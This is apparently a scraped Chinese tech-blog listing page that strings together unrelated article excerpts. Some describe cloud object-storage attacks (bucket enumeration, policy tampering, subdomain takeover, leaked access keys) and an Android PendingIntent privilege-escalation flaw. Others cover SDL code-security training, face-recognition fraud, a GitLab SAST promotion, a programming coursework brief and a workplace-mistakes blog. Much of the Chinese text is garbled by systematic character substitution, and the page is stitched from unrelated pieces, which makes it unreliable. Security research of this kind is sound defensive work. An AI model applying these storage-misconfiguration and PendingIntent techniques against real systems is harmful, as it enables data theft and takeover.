签名申请相比匿名申请,多携带了一个签名值,签名是基于密钥(SecretId/SecretKey)和申请信息加密生成的字符串。SDK 会主动计算签名,您只须要在初始化用户信息时设置好密钥,无需关怀签名的计算;对于通过 RESTful API 发动的申请,须要依照签名算法计算签名并增加到申请中。--摘自官网文档 ...

March 16, 2022 · 1 min · jiezi

关于安全:浅析云存储的攻击利用方式

文章首发于:前线Zone社区 作者:高鹏 高鹏,前线云平安实验室成员,明天分享的主题是《浅析云存储的攻打利用形式》。 本次的议题,对于云存储的一个攻打利用形式,在SRC破绽开掘,或在前线平安平台的众测我的项目中,咱们也会收到很多对于对象存储的一个劫持和权限配置的一些问题,对象存储在平安这一块也是一个不可疏忽的方向。 咱们总共把议题分为四个局部。 首先第一个局部是什么是对象存储,第二个局部对象存储利用形式,在这一环节中,咱们举例了大略有十种利用对象存储利用形式,而后最初咱们再对它进行一个总结,而后咱们在第二第三局部,咱们精心筛选了前线后盾平安众测我的项目中实在的几个破绽,并且奖金较高的,与对象存储无关的破绽进行举例,最初就是咱们的问答与探讨。 先看一下什么是对象存储。可能没有理解过的,对这个货色没有一个概念,就如同对象存储是把本人的对象存储在云上,把本人的女朋友存在云上?或者说跟开发一样,本人new一个对象,其实并不是。 咱们在国内常见,比拟大的对象存储提供商,还有包含国外的一些提供商,咱们首先看一下,第一个就是腾讯云,而后第二个就是华为云,第三个就是阿里云,到国外的话,第一个必定就是。亚马逊,而后就是微软的Azure,而后还有谷歌的Google cloud。 咱们首先来看一下这六大云的一个对象存储的一个利用形式。 1、Bucket公开拜访 首先第一个就是bucket的一个公开的一个拜访,管理员在创立bucket的时候,默认的是priavte的一个权限,如果在谬误的一个配置下,例如说给了一个ListObject的一个权限,会导致存储桶的遍历。 这是右边是aws的,而后左边是阿里云的。然而这里就存在两个问题1、如果首先第一个问题是,如果咱们只配置私有读或者私有读写的状况下,其实咱们是无奈失常的列出他所上面的一些Key,造成遍历存储桶的状况,咱们失常拜访一个咱们设置了私有读或私有读写的一个存储桶。然而这个存储桶咱们拜访的时候,他会通知咱们是Access Denied,然而咱们能够通过拜访它上面的一个key,或者对应就是咱们艰深点来讲,就是拜访它对应的一个文件,咱们就能下载到这个文件。 如果想列出Object,那么就须要在Bucket的受权策略中,咱们设置ListObject,咱们在左边的图片就能够看到,它能够把这个所有的货色给列出来。 2、Bucket桶爆破 Bucket桶的爆破,咱们在惯例的浸透中,扫描目录,是通过返回的状态码来进行判断,而这里是通过页面返回不同的报错信息来进行判断,如下图 不过值得注意的是,在微软的Azure中,如果咱们拜访一个存在的存储账户下的一个容器,首先会提醒咱们,InvalidQueryParameterValue,然而如果不存在的话,会显示无法访问该网站。 也能够通过CNAME,DNS解析的形式去获取域名的CNAME。 3、特定的Bucket策略配置 咱们拜访一个bucket,如果存在某种限度,例如,UserAgent,IP等,管理员谬误的配置了GetBucketPolicy的权限,咱们能够通过获取Bucket的策略配置来获取存储桶中的内容。 4、Bucket Object遍历 Bucket的遍历也就是如果设置了ListObject权限,而后咱们就能够看到它下面所存在的货色,其实是在SRC,或者说在众测我的项目中是十分多的,咱们能够通过curl get的形式去下载张图片。 5、任意文件上传与笼罩 将任意文件上传至存储桶,或者说也能够笼罩存储桶上曾经有的一个文件。这里次要关系到一个谬误的配置策略,PutObject。 6、AccessKeyId,SecretAccessKey泄露 能够通过反编译APK,小程序,查看JS代码中来获取泄露的AK等,稍后在第三个环节,咱们也会通过实战案例来看AK泄露的问题。 在JS代码中也能够找到泄露的Key 下图中提供了一款工具HaE https://github.com/gh0stkey/HaE 这里咱们举荐一款Burp的插件,HaE,可能无效的在测试中帮忙测试人员疾速的发现存在泄露的AK,身份证,电话号码,邮箱等。 7、Bucket劫持与子域接管 这是比拟常见的,也是众测我的项目中比拟多的,原理也很简略,bucket的名称只能有一个,如果管理员将Bucket设置了自定义域名,比方在域名中增加DNS解析,CNAME指向存储桶的域名,然而有一天管理员将存储桶删掉,然而并没有删掉在域名中的DNS解析,这种状况就会导致咱们能够去注册同样的存储桶名称来劫持该域名,咱们只须要上传任意的文件,就能够让这个域名或者存储桶显示咱们想要的货色。 不过须要留神的是,在腾讯云的对象存储中,咱们无奈造成以上的操作,因为在腾讯云的对象存储域名中,有一个APPID,这个APPID来自咱们的账户信息中。 随后咱们再举例AWS下的存储桶劫持,原理同上。 而后aws下是有一个比拟有意思的中央,就是咱们来判断aws存储桶的域名地址的时候,其实咱们是能够间接很间接的来判断进去的,就比如说它的域名是http://huoxian.cn,那么前面加上.s3.地区.http://amazon.com就能够了,起因是因为,在AWS下,配置存储桶的时候,想应用自定义的域名,存储桶的名称必须跟域名的名称一样。 咱们再来看一下微软的Azure下的劫持,原理也同上。 8、存储桶的配置可写 存储桶的配置可写,咱们拜访一个存储桶时,如果提醒咱们Access Denied的话,如下图。 咱们发现,该存储桶谬误的配置了PutBucketPolicy和GetBucketPolicy,此时咱们就能够获取存储桶的配置,而后再批改写入配置即可。 9、批改Bucket策略为Deny使业务瘫痪 当策略可写的时候,除了以上的一些操作,例如网站引入了某个S3上的资源,图片,JS等,咱们能够通过批改Effect为Deny,导致网站无奈获取这些资源随之瘫痪。 10、批改网站援用的S3资源进行钓鱼 ...

March 16, 2022 · 1 min · jiezi

关于安全:阿里云-OSS对象存储攻防

文章首发于:前线Zone社区 作者:UzJu 本文分为两个局部 第一局部介绍OSS对象存储攻防的形式第二局部为实在破绽案例 01 Bucket权限配置谬误-公开拜访 在创立Bucket桶时,默认是private的权限,如果在谬误的配置下,给了listobject权限,就会导致可遍历存储桶。 在此时如果抉择私有读的话,会呈现两种状况: 1、在只配置读写权限设置为私有读或公共读写的状况下,无奈列出对象。 然而能够间接拜访对应的KEY门路: 2、如果想列出Object对象,只须要在Bucket受权策略中设置ListObject即可。 这样再当咱们拜访存储桶域名的时候就会发现,曾经把咱们存储桶的货色列出来了。 02 Bucket桶爆破 当不晓得 Bucket 名称的时候,能够通过爆破取得 Bucket 名称,这有些相似于目录爆破,只不过目录爆破个别通过状态码判断,而这个通过页面的内容判断。 当对于阿里云OSS 不存在有两种返回状况,别离是 InvalidBucketName 和 NoSuchBucket。 InvalidBucketName:示意存储桶的名称不符合规范,属于有效的存储桶名称。 NoSuchBucket:示意没有这个存储桶。 当存储桶存在时,则会返回以下两种状况 这样通过返回内容的不同,就能够进行 Bucket 名称爆破了,晓得 Bucket 名称后,Key 的爆破也就很容易了。 03 特定的Bucket策略配置 特定的策略配置的指的是,如果管理员设置了某些IP,UA才能够申请该存储桶的话,此时如果谬误的配置了GetBucketPolicy,可导致攻击者获取策略配置。 能够看到咱们此时是没有权限拜访该存储桶的,咱们尝试应用aliyun的cli获取policy。 咱们能够看到,须要合乎UserAgent为UzJu才能够拜访。 04 Bucket Object遍历 如果设置了ListObject,这将会导致Bucket桶被遍历。 可通过拜访Key,来下载该文件。 05 任意文件上传与笼罩 如果在配置存储桶时,管理员谬误的将存储桶权限,配置为可写,这将会导致攻击者可上传任意文件到存储桶中,或笼罩曾经存在的文件。 如果指标的对象存储反对 html 解析,那就能够利用任意文件上传进行 XSS 钓鱼、挂暗链、挂黑页、供应链投毒等操作。 06AccessKeyId,SecretAccessKey泄露 ...

March 15, 2022 · 1 min · jiezi

关于安全:CIS-2021网络安全创新大会代码安全体系建设实录

一、背景汤青松 ,北京趣加科技有限公司 平安工程师,实体书《PHP WEB平安开发实战》作者,善于企业平安建设,SDL平安建设。PHPCon 2020 第八届 PHP 开发者大会分享《PHP平安编码标准与审查》,NSC 2019第七届中国网络安全大会分享《PHP反序列化破绽剖析实际》看雪2018 平安开发者峰会负责Web平安训练营 讲师大家好,非常高兴给大家分享《代码平安体系建设》议题,我是汤青松,目前在 SDL 方面做的比拟多的。明天讲的这个话题其实和 SDL 有很大关系的。我这次分享这个话题的其实就是 SDL 当中的一部分。很多同学如果在甲方也会去做 SDL 当中的一些工作,所以我心愿我这次分享的内容对大家有所帮忙。 这次分享的话题是 SDL 当中的一部分,然而它不齐全是 SDL 因为我次要还是聚焦于在平安向左移的这样一个概念当中。所以明天分享的话题次要是聚焦于这个代码风险管理。那在这个代码平安当中可能有哪些危险点了?那它可能会蕴含技术方面的工作和非技术方面的工作,比如说管理工作以及这个学习方面的一些事件都会有解说到。 1.1内容概要我明天讲的这个话题,次要还是在于意识、技术、监督和学习四个方面怎么去发展咱们的平安工作?这里我做了一张脑图,那在脑图当中,我感觉从这个淡淡平安体系当中,咱们有四个层面了能够去做的,比如说这个平安培训。 在平安培训当中,咱们第一点要通知他有哪些危险点,第二个就是咱们得教他怎么去避坑,那么教他避坑了,咱们就能够间接拿到他这个仓库的代码,而后咱们本人先去剖析一遍,剖析完之后,而后在培训的时候咱们就能够通知他你这个代码了哪里会存在一些危险点,把这个问题通知他。 第三个就是咱们通知你了,你不能怎么去写,你应该怎么去写。那么咱们制订完这一套规定了,咱们不可能说其实人工去盯着您得有一套监督机制。这里我也会给大家去讲一下,怎么去联合semgrep 和GitLab做一个钩子事件,实时检测这个代码当中的一些危险点。 那么第四个就是咱们在上线前必定会有平安测试。在平安测试当中可能会有哪些疑难点?那明天我大抵会提到这样几个问题点。那首先咱们来说一下平安培训咱们怎么去做。那平安培训我置信很多做技术的同学,他可能就是本人的技术了是比拟好的,然而让他去给他人讲怎么去踩坑以及一些案例,她不肯定是他善于的。 咱们先来说一下我是如何了解保障整个利用平安的,我认为它不是由某一个维度是否做得足够好来掂量,它是一个综合的方面。也是多个团队配合起来的一个工作,咱们作为平安人员在这里要负次要责任。 咱们要想尽一切办法去和开发和测试一起保障保障利用平安。咱们首先给这些开发人员建设这样一个安全意识,那通知他了互联网当中会有很多的一些破绽,那这些破绽了有哪些危害?那首先在他开发的时候,他就会想到不能让这个利用有破绽。 第二个让他无意识之后,要教他怎么去避开这些坑,不要让他晓得有这些平安危险起来,他不晓得怎么去解决,而后还是踩坑了。那么这个时候咱们平安人员本人在这个技术方面了,要有肯定的这个能力。 第三个在监督层面。如果说你通知开发人员互联网当中有很多破绽,也教他去避坑了。然而没有监督很多人了他可能并不一定依照你的要求去做,所以这个时候您得有肯定的监督机制。 第四点是是通过事件驱动,我置信作为甲方,你必定还会遇到一些安全事件去驱动。比如说咱们公司是做游戏的,还时不时会有一些拖机挂或者等等一些外挂这些方面的问题。那么咱们会把这些事件给整顿起来,整顿成案例,再给这些开发人员去学习。 二、 平安培训 所以这里我讲几个非技术性的一个话题,就是咱们怎么去给这些开发做培训。那首先我感觉做培训有这几个方面,我能够给大家一些参考意见。比如说首次的这个培训咱们讲什么话题?怎么防止一次性把这个话讲了,那么我下个季度还讲不讲?是不是我一次性了就把话讲完了我感觉都是有一些技巧的,就是你第一次该讲什么货色。 第二个说咱们培训了是,一次培训了,咱们就把所有的这个开发组成员了都叫上。那么比如说几十号人,上百人都叫上,而后咱们本人在一个舞台下来讲还是这个小组去讲了。那这里头我是举荐大家小组讲,那一会我会讲到为什么去小组讲。 第三个就是案例就地取材案例了,咱们肯定要在每次培训之前把他那个代码关上去看一下,拿着他的代码给她们做一完培训。而后接着了咱们就发展咱们这次要培训的一个话题,那这样的一个模式。 2.1 首次根底培训 首次根底培训了咱们能够给他讲哪些货色了?我感觉你首先能够给他讲一下你在这个甲方平安当中了,你是怎么去给他们做代码审计的,你是怎么去做平安的?这个其实是她比较关心的,让他理解你的工作。那你平时会关注哪些点,你给他充沛交换一下。那么建设一个互信机制。 第二个你能够给他讲一下这个破绽分类,比如说了通用的一个编码型破绽,比如说SQL注入, XSS csrf 文件上传,而后命令执行代码注入等等这些问题。那把这些问题了给讲完之后了,咱们还能够给他介绍一下这个逻辑性破绽,比如说这个领取破绽、越全破绽、验证码破绽、短信破绽等等这些破绽了,咱们能够给他科普一下。 那么讲这些破绽的时候,你能够去联合他们这个小组了,他们是做哪方面业务的?比如说做中台的了,他可能会脱离业务。他可能没有这样一个领取的问题,或者说没有用户的一些问或等等和他这个主无关的一些问题,能够给大略提一下,但不要讲细了。 第三个你能够给他讲一下代码自查的一些办法,你能够教他一些简略的办法,比如说他写完代码之后了,怎么去审计本人的平安问题?但这个参数有没有做过滤类型,是否强制的,比如说我要介绍一个 ID 那在 PHP 语言当中了,那可能他没有应用这个整型转换,那么承受了有可能这个字符,那么拼接到这个SQL注入当中了对吧?那这个时候你就要跟他讲,你说你在这个接管的时候你得做一次过滤,你如果没有做过滤了,在拼接社会语句的时候你得做 pdo ,而后查 SQL 大抵教他一下怎么去查。 那这个SQL破绽怎么查了?我置信做甲方的技术同学都有肯定的见解,在这里我就不开展了,你能够给这些开发的大略提一下。一般来说就是做开发的同学了。本人对这一块也是比拟理解的,你给他点个结尾,他本人很多事件他能想明确的。 2.2 小组培训 第二个就要在做培训的时候了,我的倡议是小组培训,比如说你们一个公司可能会分为很多个小组。那么我目前来说我次要是给后端的同学做培训。所以我个别做培训的时候我会讲后端的一些货色。那么后端他每一个组了他其实波及的货色都不一样,比如说有些组了他不会用到 HTTP 协定,他就会用这个 socket TCP 这种协定。那么你给他去讲一些 web 业务的一些破绽了,他可能不爱听。 ...

March 15, 2022 · 2 min · jiezi

关于安全:PendingIntent重定向一种针对安卓系统和流行App的通用提权方法BlackHat-EU-2021议题详解-下

以用户隐衷平安为核心,用责任兑付信赖,OPPO成立子午互联网安全实验室(ZIWU Cyber Security Lab)。实验室以“爱护用户的平安与隐衷,为品牌注入平安基因”为使命,继续关注并发力于业务平安、红蓝反抗、IoT平安、Android平安、数据和隐衷爱护等畛域。 本篇文章源自OPPO子午互联网安全实验室。 1 不平安PendingIntent的通用利用办法1.1 不平安PendingIntent的特色至此,咱们曾经解决了本议题的第一个问题,通过钻研表明,Android零碎中应用的PendingIntent大都 能够被三方App获取。 获取形式包含bind SliceProvider、监听告诉、连贯媒体浏览器服务或者bind包容 窗口小部件的AppWidgetsProvider。 于是,引入议题钻研的第二个关键问题:如果这些PendigIntent不平安,如何利用能力造成平安危害? 首先,咱们须要分别什么样的PendingIntent是不平安的。后面形容的公开破绽案例,均为劫持base Intent为空Intent的播送PendingIntent,阐明如下empty base Intent构建的PendingIntent确定存在平安问题。 Android 12之前的开发者文档也对base Intent为隐式Intent的PendingIntent提出了平安正告,但却没 有明确告知到底存在何种危害。而且在AOSP代码和风行App当中,如下的代码模式宽泛存在。这不禁让 咱们考虑, Implicit base Intent构建的PendingIntent是否真正存在问题?唯有找到一种确定的针对这 种PendingIntent的破绽利用办法,能力真正证实平安问题的存在。 1.2 深刻Intent fillIn改写机制寻找利用办法之前,须要深刻摸索PendingIntent的改写机制,这决定了其余App取得PendingIntent以 后,如何对base Intent进行改写。这个机制由 Intent.fillIn 函数提供: 在上述代码中,this对象指向以后Intent,other为其余Intent。如果以后Intent中的成员变量为空,则可 以被other中相应的成员变量笼罩。比拟非凡的是Intent中的component和selector成员,即便以后Intent中的component和selector为空,也不能被other所改写,除非PendingIntent设置了FILL_IN_COMPONENT或者FILL_IN_SELECTOR标记。 1.3 PendingIntent重定向攻打因而在获取PendingIntent之后,其base Intent的action、category、data、clidpdata、package、flag、extra等成员都是有可能改写的,而component和selector无奈改写,如图所示。特地地,对于base Intent为隐式Intent的这种状况,action曾经被设置了,因而也无奈被改写,攻击者无奈如后面安 卓零碎broadcastAnyWhere破绽那样,通过劫持PendingIntent、在base Intent中从新增加action,隐式关上一个受爱护的组件。 图 Intent成员 这里就来到了问题解决的关键点,因为package能够指定,回想到以前在Intent Bridge破绽中的利用方 法,咱们能够通过设置intent中的flag来奇妙地解决这个问题。Intent提供了无关长期受权的标记: FLAG_GRANT_READ_URI_PERMISSION:Intent携带此标记时,Intent的接收者将取得Intent所携 带data URI以及clipdata URI中的读权限FLAG_GRANT_WRITE_URI_PERMISSION:Intent携带此标记时,Intent的接收者将取得Intent所携 带data URI以及clipdata URI中的写权限简言之,歹意App对PendingIntent进行了指向歹意App本人的重定向,通过对PendingIntent base Intent的局部批改(批改包名、受权标记和data/clipdata),使其以受益App的权限关上歹意App本身, 这样歹意App在被关上的霎时即取得对受益App公有数据的读写权限。具体的利用办法如图所示: 图 PendingIntent重定向攻打 步骤如下:1、受益App通过getActivity构建PendingIntent,在告诉、SliceProvider、窗口小部件中应用,假设其base Intent为隐式Intent; 2、攻打App 通过后面探讨的各种渠道获取受益App的PendingIntent; 3、攻打App批改PendingIntent中的base Intent,因为是隐式Intent,因而action、component和selector都不能批改。但能够做如下批改: ...

March 15, 2022 · 1 min · jiezi

关于安全:人脸识别在线上金融业务中的应用风险

2021年,广州互联网法院通报了一起因为“刷脸”引发的借款纠纷。客户王兰(化名)在遗失了身份证后,却被人冒用身份通过银行的“人脸识别”贷款,导致王兰因逾期原告上了法庭。经司法笔迹鉴定,认为案涉客户签名并非王兰自己签订,手机号码亦未曾注销在王兰名下。最终,法院驳回银行全副诉讼请求。 2020年10月,四川警方查处一个上百人的欺骗团伙。该团伙购买大量人脸视频,借助“僵尸企业”“空壳公司”,为6000多人包装公积金信息,而后向多家银行申请公积金贷款,最终带来10亿多元的坏账。 一系列看似荒诞的案件,给银行机构敲响了警钟,“人脸识别”的准确性面临质疑。 人脸识别在金融业的利用2015年末,央行《对于改良集体银行账户服务增强账户治理的告诉》中明确提出,提供集体银行账户开立服务时,有条件的银行可摸索将生物特色辨认技术和其余平安无效的技术手段作为核验开户申请人身份信息的辅助伎俩。为落实中国人民银行的要求,各金融机构开始鼎力摸索、推动人脸识别技术在各畛域的利用。 人脸识别作为一种生物辨认技术,被宽泛使用于金融畛域,次要作用是实现在线身份认证。“刷脸”利用在自助终端、柜台以及挪动端多个渠道商。尤其随着新冠疫情的影响,非接触零接触的金融服务飞速发展,减速银行数字化转型,线上金融服务飞速发展。 人脸识别曾经成为登录、确认、申请、批改等业务环节中重要的验证技术,同时也存各类平安危险。 有媒体报道,大量社群和境外网站进行真人人脸识别视频的贩卖。“价高质优”的验证视频百元一套,动静软件将人脸照片制作成“动静视频”只有几元,以实现各类线上业务人脸识别的验证。此外,清华大学钻研人员已经在15分钟解锁了19个生疏智能手机。 能够分明地看到,人脸识别技术带来人们便当的同时,也要带来的各类仿冒、攻打、盗取等三类安全隐患。 仿冒登录。戴上眼镜、帽子、面具等假装伎俩,或者能够制作人皮高仿模型、将2D人脸照片3D建模、利用AI技术将动态照片变成动静照片等多种技术均,混同算法判断,达到坑骗零碎的目标。能够骗过有效性不高的人脸识别算法和活体监测算法。 劫持篡改。近程入侵篡改人脸识别系统验证流程、信息、数据等,将后盾或前端的真数据替换为假数据,以实现虚伪人脸信息的通过。 盗取冒用。通过各类公开或非法手段,收集、保留、盗取失常的人脸数据,而后非法冒用。因为人脸的构造、形状类似,并且脸部表情、角度、光线、环境、穿戴、年龄的因素,导致人脸的视觉图像也相差很大。因而,内部客观因素对人脸识别也带来较多影响。 多方面晋升人脸识别利用平安客户身份辨认是金融机构预防洗钱立功、防备金融风险的第一道平安防线。上海银保监局公布对于防备人脸识别技术应用危险的生产提醒,揭示金融消费者要做到“人脸识别有理解,生物信息应爱护,手机操作莫予人”,让人脸识别技术真正便民、利民、护民。 人脸识别利用平安须要在三方面增强: 第一,晋升人脸识别零碎的精准度,例如通过模型和算法进步真伪判断;基于空间域的检测,例如图像取证的检测、生物频率,如GAN的伪影检测、基于生物信号的检测,视声不统一以及视觉上不天然等。 第二,保障人脸识别零碎的安全性。防备API接口被篡改劫持,保障输入成果、生成网络成果的实在、发现设施和零碎端口、通信的异样;及时预警,避免灌入虚伪人像、混同虚实人像、库内人像信息被篡改;保障人脸数据存储以及传输的完整性、机密性等。 第三,晋升人脸识别辨认的风控能力。人脸识别是一种技术核验,但不能作为惟一的伎俩。须要采纳身份证、手机号码、银行卡、操作行为、设施、环境等综合伎俩进行核验,甚至须要人工电话核实。通过平面的风控体系,加强人脸识别从源头到利用的全链条预警、拦挡、防护能力,晋升人脸识别利用的安全性。 人脸识别利用更离不开法律法规护航。2021年7月,最高法院公布《对于审理应用人脸识别技术解决个人信息相干民事案件适用法律若干问题的规定》,对人脸信息提供司法爱护。解释明确规定,在宾馆、商场、车站、机场、体育场馆、娱乐场所等经营场所、公共场所违反法律、行政法规的规定,应用人脸识别技术进行人脸验证、辨识或者剖析,该当认定属于侵害自然人人格权利的行为。 行业机构也在牵头制订利用规范。2021年4月7日,中国信息通信研究院云计算与大数据研究所倡导发动成立“可信人脸利用守护打算”。顶象等多家公司入选第二批“可信人脸利用守护打算”成员单位,将与各界通力合作,积极探索人脸利用治理与倒退的可信指引,助力人脸识别利用平安倒退,共建可信的人脸利用生态。

March 14, 2022 · 1 min · jiezi

关于安全:两行代码助你搞定SAST静态应用程序安全测试

极狐GitLab DevSecOps极狐GitLab DevSecOps 具备七大平安性能:容器镜像扫描、动态利用平安测试 (SAST)、动静利用平安扫描(DAST)、密钥检测、License合规、依赖项扫描以及含糊测试,笼罩了软件开发的全生命周期。极狐GitLab DevSecOps 除了可能助力用户真正的做到平安左移和继续自动化以外,还具备以下特点: 使用方便,用户敌对用户在开启 DevSecOps 性能(旗舰版用户默认可见可用,其余版本用户如果想用,能够申请收费试用,流程参考文章结尾章节)之后,只须要在 CI/CD Pipeline 中进行简略配置(个别仅为寥寥数行代码,下文会演示)即可开始应用,用户无需装置配置第三方工具或插件,加重了保护多种平安工具链所带来的工作累赘,同时对研发、平安、运维等人员也十分敌对(只需简略配置 yaml 文件即可),晋升了上述人员的应用体验。 后果可视,公开通明所有平安扫描后果都会在平安面板进行对立展现,能够依据不同的过滤器选项来失去指定平安防护伎俩的平安报告,只有是与此相关相干且曾经获取受权的人员,都能够查看到相应的平安报告,包含破绽内容,修复策略等。 追踪不便,便于管理能够通过配置,在提交 MR 的时候,对于所提交代码进行平安扫描,整个扫描后果最终会显示在 MR 中,如果发现有安全漏洞,能够立马创立相应的 Issue 来对此破绽进行追踪治理。这种和研发工作流相结合的形式可能大大缩短安全漏洞的修复工夫,同时整个过程是公开通明的,可能让团队成员之间建设起良好的信赖。后面的文章中别离介绍了极狐GitLab DevSecOps 性能中的容器镜像扫描、敏感信息检测以及依赖扫描: 极狐GitLab DevSecOps 之容器镜像扫描极狐GitLab DevSecOps 之敏感信息检测极狐GitLab DevSecOps 之依赖项扫描 本文来演示极狐GitLab DevSecOps 性能中 SAST 的用法。 SASTSAST 是 Static application security testing 的缩写,也即动态应用程序平安测试,俗称动态剖析,是一种应用程序的平安测试伎俩,呈现较早,次要是通过剖析源码来发现潜在的安全漏洞,从而确保软件平安。 SAST 属于白盒测试,剖析后果可能准确到代码行数,而且通常是在代码编译之前进行,因而属于 SDLC 的晚期,修复问题的老本绝对较低。 极狐GitLab DevSecOps 之 SAST极狐GitLab的 SAST 性能反对多种语言,包管理器,框架等,诸如 Java、Go、.Net、JavaScript、Node.js等,Helm Charts、Kubernetes manifests等,React。只须要在极狐GitLab CI/CD 中退出如下两行代码即可使能 SAST: include: - template: Security/SAST.gitlab-ci.yml上面通过一个 Demo Repo 来演示应用流程。Demo Repo 很简略,代码目录如下: ...

March 14, 2022 · 1 min · jiezi

关于安全:com6516

com6516 Assignment 2020-21Assignment (60 points)The TaskYou have a client who is a manager of a swimming pool, now aiming to extend their business toa larger scale sport club. As a first step to that end, they would like to improve their membershipmanagement scheme by replacing a traditional spreadsheet with a bit more modern system usinga GUI (graphical user interface).The client is requesting you to propose a new scheme. Your task is to demonstrate your systemdesign which should be implemented using the object oriented programming language Java.Loose description for the membership. A swimming club has recently expanded to accommodatea gym and some other facilities, also started offering yoga and aerobics lessons for itscustomers. Customers consist of individual members, family members, and visitors. An individualmember should be at least 12 years old on the 1st of September of the current year. A familymember should be at least 18 years old and can include themselves, their spouse and children.Both individual and family members are required to pay a membership fee. Any person under12 years old can use facilities without a fee, if accompanied by a member. A visitor of at least12 years old can also use facilities without being a member, but by paying a fee for each visit.Loose description for the fee system. The membership management scheme should be maintainedin a way that the fee income up to the current date from the beginning of the year (1stJanuary of this year) can be calculated easily. An individual member pays a fixed monthly feeof 36 pounds and has unlimited access to its facilities, including yoga and aerobics lessons freeof charge. A family membership requires 60 pounds per month, with the same benefit to allfamily members as individual members. A visitor pays a fee each time they visit the club however,if someone visits the club frequently, a visitor fee will accumulate substantially more thanmembership fees.Apart from the above rough guidline, you may decide the fee system sensibly. In addition tomonthly fees, quarterly and yearly fees can be introduced. It may also be possible to applydifferent fee levels for use of swimming pool, gym, and lessons for visitors. Further, it is yourdesign how to present the fee income using the system.Core requirement. Each membership information may consist of first and last names, date ofbirth, gender, postal address, contact telephone number, and some other information informationthat may be useful, such as health condition, allergy information, or anything else. An age onthe 1st September of the current year, dates for starting and ending the membership, as wellas the type of membership and the amount of fee paid, may also be required. The number ofvisitors per day can be logged into the system separately without their personal information.A new membership management system using a GUI may require manual entry for many fields,however• a unique membership number is created automatically and randomly (i.e., not sequentially), ...

March 13, 2022 · 8 min · jiezi

关于安全:PendingIntent重定向一种针对安卓系统和流行App的通用提权方法BlackHat-EU-2021议题详解上

1 简介1.1 Intent安卓零碎中,Intent是在组件间传递的通信音讯,用于执行关上Activity、发送播送、启动服务等动作,而Intent对象外部的字段则规定了Intent发送的目标组件,以及执行动作的具体内容,包含action、category、data、clipdata、package、flag、extra、component和selector。 其中component和selector用于设置Intent的目标组件,规定Intent发送给谁。依照是否设置component和selector,Intent可划分为: • 显式Intent:具备component或者selector的Intent• 隐式Intent:仅设置了action的Intent,注册对应action的Intent-filter的组件能够接管到Intent。 另外,还有一种非凡的空Intent new Intent(),既没有设置component,也没有设置action,甚至没有设置任何字段。 1.2 PendingIntentPendingIntent能够看作Intent的高级版本,实现了一种委托受权发送Intent进行组件间通信的机制。 首先,App能够应用getActivity、getBroadcast、getService等API向Android零碎申请一个PendingIntent对象,例如在函数getActivity : 中,intent参数形成了所⽣成PendingIntent对象的base Intent,⽽在此特定的getActivity函数中,该base Intent应该⽤于关上Activity,否则⽆意义。后⾯的flags参数决定了PendingIntent的⾏为,例如FLAG_IMMUTABLE就⽤于规定base Intent不能被改写。 接下来,这个PendingIntent对象能够发送给其余App应用,其余App调用PendingIntent.send时,就可能以PendingIntent源App的身份和权限发送PendingIntent中的base Intent。其余App甚至还能够提供一个新的Intent,对base Intent进行改写。 因而, App A将PendingIntent交给App B,就意味着将本人的身份与权限连同要做的事件委托给了App B, 这个事件由PendingIntent中的base Intent指定。 如果歹意App有能力获取上述通信过程中的PendingIntent,就可能以源App的身份和权限发送批改后的base Intent,造成非预期的平安结果,这就是PendingIntent面临的平安危险。 2 历史钻研以往的钻研波及的理论破绽案例不多,一个驰名的例子是Android零碎AccountManagerService中的BroadcastAnyWhere破绽,波及到Settings App、System Server与Authenticator App的简单交互。 在上面Step 2中AccountManagerService通过addAccount回调函数提供给AppB Authenticator的options bundle对象中,蕴含了一个PendingIntent,其base Intent为空Intent: 因为这个播送PendingIntent由system_server AccountManagerService(uid 1000)所创立,代表了零碎的身份和权限,且并未设置base Intent的其余字段。一般Authenticator App拿到当前,改写其base Intent,例如设置一个action android.intent.action.BOOT_COMPLETED ,最初调用 PendingIntent.send 以uid 1000的身份发送特权播送。 第二个案例来源于CanSecWest2016的分享,即时通信软件LINE App启动服务时透露了一个PendingIntent对象,且base Intent为空Intent: 下面启动服务应用的隐式Intent,因而歹意APP能够注册一个Intent-filter为jp.naver.android.npush.intent.action.SUBSCRIBE 的服务,而后获取下面的PendingIntent,最初以LINE App的身份发送播送,造成伪造LINE App推送音讯的危害。 3 PendingIntent应用场景以往公开的钻研仅给出了两个无关不平安PendingIntent应用的罕见案例,均为携带空Intent的播送PendingIntent,在IPC通信中透露给了歹意App。然而,PendingIntent在Android零碎的应用中又如此宽泛,在IPC通信中的应用仅为冰山一⻆。 PendingIntent还能够宽泛存在于SliceProviders、告诉(Notifications)、媒体浏览服务(MediaBrowserServices)、窗口小部件(AppWidgets)、定时器管理器(AlarmManager)当中,这就涉及了本议题要解决的第一个问题:Android中这些宽泛应用的PendingIntent是否有可能被App获取,如何获取? 通过咱们钻研发现,安卓零碎中宽泛应用的SliceProvider、告诉、窗口小部件、媒体浏览服务所应用的PendingIntent,都有可能被歹意APP获取,这就极大地拓展了PendingIntent 的攻击面。 3.1 SliceProviderSliceProvider是自Android P开始引入的一种应用程序间共享UI界面的机制,Slice的出现者(SlicePresenter),能够通过Slice URI和Android零碎提供的bindSlice等API来拜访另一个App通过SliceProvider分享进去的Slice。 ...

March 11, 2022 · 1 min · jiezi

关于安全:谈谈工作中的犯错

想到这个题目是因为最近咱们组呈现了一个重大的线上问题,某小哥在进行线上操作的时候传错了一个参数。这种问题在程序员这行很常见,所谓常在河边走,哪有不湿鞋。 工作这么多年我本人犯过错,也看到过身边的删库跑路案例,更有甚者因为泄露敏感信息而锒铛入狱。这里分享一些本人所见的实在案例,以及如何在编程上、工作习惯上防止犯错。 案例分享信息泄露大疆前员工泄露公司源代码,被罚 20 万、获刑半年,这个安全事故齐全是因为员工的安全意识有余造成的。 这类问题十分多,不信你能够在 Github 上用 password、private key 之类的关键词搜寻,很多人会有意识把这些敏感信息推送到 Github 上,而公司又没法齐全禁止 Github,只能不断加强平安培训和监控。 从这个案例来看公司的损失十分十分大,单人力老本这块就难以估计,我也因为这个事变参加到了平安建设中,前面在这里畛域工作了两三年左右。真是一人挖坑,有数人救火。 退款接口我在做领取、物流相干的零碎时,已经因为一个诡异的接口造成了间接上的金钱损失。 咱们的领取是通过第三方领取零碎做的对接,比方用户通过领取零碎向咱们预领取了 100 美金,等他收货后第三方把钱给咱们。第三方领取有个退款接口,假如他不想要货了于是发动退单,咱们的零碎就会调用第三方的领取接口去退款。 因为接口有时候调用失败或者返回不及时,我在写代码的时候默认既然对方预领取了 100 